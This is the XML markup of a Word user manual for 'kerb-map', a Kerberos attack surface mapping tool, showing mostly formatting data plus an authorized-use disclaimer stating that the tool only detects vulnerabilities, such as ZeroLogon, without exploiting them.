            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>IMPORTANT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7920" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FDEDEC"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0E4051C4" w14:textId="0CB1BF38" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>kerb-map is designed exclusively for use in authorized security assessments, penetration testing engagements, and red team operations where written permission has been obtained from the system owner.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="538A8654" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0450392F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Use of this tool against systems for which you do not have explicit written authorisation is illegal under the Computer Fraud and Abuse Act (CFAA), the UK Computer Misuse Act, and equivalent legislation in most jurisdictions worldwide.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AE6C6F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0282A62F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>The author assumes no liability for misuse of this tool. It is your responsibility to obtain proper authorisation before running any scan. Always operate within the defined scope of your engagement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692E13F7" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C0E218" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>kerb-map does not exploit vulnerabilities — it detects them. The CVE check modules perform non-destructive detection probes only. The one exception is the ZeroLogon probe, which sends a crafted but non-exploiting Netlogon request; this too performs no modification to the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAE8AC3" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0E1EBA" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BD8EC6" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="400" w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kerb-map v1.1  —  Kerberos Attack Surface Mapper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571B2D87" w14:textId="45A39E08" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Built for authorized penetration testers and red team operators.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00707BE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F593E" w14:textId="77777777" w:rsidR="008F3962" w:rsidRDefault="008F3962">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5D0B2122" w14:textId="77777777" w:rsidR="008F3962" w:rsidRDefault="008F39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AAC71" w14:textId="5E79AE75" w:rsidR="00707BE4" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
      </w:pBdr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:proofErr w:type="spellStart"/>
    <w:r>
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>kerb</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r>
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">-map </w:t>
    </w:r>
    <w:proofErr w:type="gramStart"/>
    <w:r>
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>v1.1  —</w:t>
    </w:r>
    <w:proofErr w:type="gramEnd"/>
    <w:r>
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">  For </w:t>
    </w:r>
    <w:r w:rsidR="00E11042">
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>authorized</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve"> engagements </w:t>
    </w:r>
    <w:proofErr w:type="gramStart"/>
    <w:r>
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>only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E11042">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E11042">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A8F1D" w14:textId="77777777" w:rsidR="008F3962" w:rsidRDefault="008F3962">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="372F8C9B" w14:textId="77777777" w:rsidR="008F3962" w:rsidRDefault="008F39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1417" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
      </w:pBdr>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="1A1A2E"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">KERB-MAP User </w:t>
    </w:r>
    <w:proofErr w:type="gramStart"/>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="1A1A2E"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>Manual</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="777777"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">  —</w:t>
    </w:r>
    <w:proofErr w:type="gramEnd"/>
    <w:r>
      <w:rPr>
        <w:color w:val="777777"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">  Kerberos Attack Surface Mapper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45D0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DD1AE4BA"/>
    <w:lvl w:ilvl="0" w:tplc="77F20BEA">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="70E2099C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="F6C800D2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="B6EAB480">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="29B8FE1A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="BE823890">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="75DAA14E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="98662BB4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E8DCF26A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="284472A3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B3BCD278"/>
    <w:lvl w:ilvl="0" w:tplc="00B2060C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="71A8C0C8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="65922B30">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="15BADB4E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="BE9CE1CA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="B62C3FEC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="8D069EC4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="5BD0BBD4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="6314800C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="40675EE5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="85F81FB0"/>
    <w:lvl w:ilvl="0" w:tplc="2842F4D8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="C1625662">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="◦"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="482C4ED0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="F4B43BE4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="17E29706">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="34AADD6A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="B3265AE4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="5D68CCE4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="F4F29148">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1824739552">
    <w:abstractNumId w:val="1"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1365474467">
    <w:abstractNumId w:val="2"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="974548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BE4"/>
    <w:rsid w:val="004C4481"/>
    <w:rsid w:val="00707BE4"/>
    <w:rsid w:val="007B3996"/>
    <w:rsid w:val="008F3962"/>
    <w:rsid w:val="00B514DB"/>
    <w:rsid w:val="00DC3FBC"/>
    <w:rsid w:val="00E110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90794"/>
  <w15:docId w15:val="{481E6833-B302-479C-8EDD-A980E1A2B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1A2E"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="280" w:after="120"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2471A3"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:uiPriority w:val="9"/>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E11042"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E11042"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E11042"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Revision">
    <w:name w:val="Revision"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00B514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5235</Words>
  <Characters>29841</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>248</Lines>
  <Paragraphs>70</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>35006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Moussa Toure</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-16T14:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-16T17:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>